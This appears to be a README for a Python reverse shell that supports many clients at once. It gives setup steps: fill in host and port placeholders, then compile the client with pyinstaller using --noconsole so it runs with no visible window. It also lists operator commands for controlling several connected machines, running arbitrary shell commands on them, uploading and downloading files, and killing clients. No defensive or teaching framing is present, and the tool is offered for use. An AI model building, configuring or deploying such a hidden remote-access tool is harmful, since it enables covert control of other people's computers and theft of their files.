A Multi Client And Singular Client Reverse Shell Made In Python
- Edit Host And Client
client.py
host = "YOUR HOST"
port = "YOUR PORT"
server.py
host = "YOUR HOST"
port = "YOUR PORT"
- Compile Client
pip install pyinstaller
pyinstaller --onefile --noconsole --icon=NONE client.py
-------------------Commands------------------------
list Lists All The Connected Clients
connect <NUMBER> Connect To a Client Shell
sendall <COMMAND> Sends All Clients A Command
exit Exits Server And Kills Clients
Commands
---------------------
All System Shell Commands
upload <FILE>
download <FILE>
clear
quit